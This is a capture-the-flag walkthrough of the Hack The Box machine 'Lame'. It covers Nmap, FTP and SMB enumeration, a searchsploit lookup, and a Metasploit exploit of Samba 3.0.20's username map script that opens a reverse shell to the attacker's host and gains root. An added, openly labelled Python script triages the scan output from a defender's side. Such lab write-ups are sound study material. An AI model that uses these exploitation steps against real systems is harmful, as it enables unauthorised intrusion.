Lame

From RCATs

Run an Nmap scan with default scripts and version enumeration.

# Nmap 7.93 scan initiated Thu Dec 15 12:10:11 2022 as: nmap -sCV -oA nmap/lame -Pn 10.129.31.107
Nmap scan report for 10.129.31.107
Host is up (0.067s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.16.18
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h30m27s, deviation: 3h32m11s, median: 24s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-12-15T14:11:01-05:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 15 12:11:12 2022 -- 1 IP address (1 host up) scanned in 61.04 seconds

Nmap reports that FTP allows anonymous login, so we check it; however, we don't get anything out of it.

❯ ftp anonymous@10.129.30.102
Connected to 10.129.30.102.
220 (vsFTPd 2.3.4)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>

Run enum4linux-ng to see what we get. The first thing I noticed was SMB 1.0: true. However, this is a Linux box, so no EternalBlue for us...

...<SNIP>...

 ==========================================
|    SMB Dialect Check on 10.129.30.102    |
 ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: true
  SMB 2.02: false
  SMB 2.1: false
  SMB 3.0: false
  SMB 3.1.1: false
Preferred dialect: SMB 1.0
SMB1 only: true
SMB signing required: false
[*] Enforcing legacy SMBv1 for further enumeration

...<SNIP>...

Next, I noticed the version: Samba 3.0.20.

 ================================================
|    OS Information via RPC for 10.129.30.102    |
 ================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 3.0.20-Debian)
OS version: '4.9'
OS release: not supported
OS build: not supported
Native OS: Unix
Native LAN manager: Samba 3.0.20-Debian
Platform id: '500'
Server type: '0x9a03'
Server type string: Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian)

A quick searchsploit query gives us a result. I want to get some more use out of Metasploit, so let's try that.

❯ searchsploit Samba 3.0.20                                                                                            
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path                           
------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                               | multiple/remote/10095.txt       
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)     | unix/remote/16320.rb            
Samba < 3.0.20 - Remote Heap Overflow                                                | linux/remote/7701.txt           
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                        | linux_x86/dos/36741.py          
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
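As an added example that is not part of the original write-up, a small Python triage script that reads Nmap output like the scan above (embedded as a constructed excerpt with the same values) and flags the three findings the rest of the walkthrough turns on: anonymous FTP, SMB message signing disabled, and a Samba version inside the range the searchsploit entry names (3.0.20 up to 3.0.25rc3, treated here as anything below 3.0.25). The regex and version bounds are my own, not from any tool on the page.

```python
import re

# Constructed excerpt of the Nmap normal-format output shown above (same values).
NMAP_OUTPUT = """\
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+(.*)$")
# Version range named by the searchsploit entry: 3.0.20 <= v < 3.0.25 (assumed bounds)
USERMAP_LOW, USERMAP_HIGH = (3, 0, 20), (3, 0, 25)

def parse_version(banner):
    """Return the first x.y.z version in a banner as an int tuple, else None."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(g) for g in m.groups()) if m else None

def samba_in_usermap_range(version):
    """True when a parsed Samba version falls inside the affected range."""
    return version is not None and USERMAP_LOW <= version < USERMAP_HIGH

def triage(nmap_text):
    """Walk Nmap normal output and collect the findings a defender should fix."""
    findings = []
    port = None
    for line in nmap_text.splitlines():
        m = PORT_RE.match(line)
        if m:  # a port line sets the context for the script lines that follow it
            port, banner = m.group(1), m.group(3)
            version = parse_version(banner)  # "3.X - 4.X" on 139/tcp yields None
            if "Samba" in banner and samba_in_usermap_range(version):
                ver = ".".join(map(str, version))
                findings.append(f"{port}/tcp: Samba {ver} in username-map-script RCE range")
        elif "ftp-anon: Anonymous FTP login allowed" in line:
            findings.append(f"{port}/tcp: anonymous FTP login allowed")
        elif "message_signing: disabled" in line:
            findings.append("host: SMB message signing disabled")
    return sorted(findings)

if __name__ == "__main__":
    for finding in triage(NMAP_OUTPUT):
        print(finding)
```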

Works! Root...

msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.16.18:4444
[*] Command shell session 1 opened (10.10.16.18:4444 -> 10.129.30.102:43409) at 2022-12-16 17:04:38 -0700
id
uid=0(root) gid=0(root)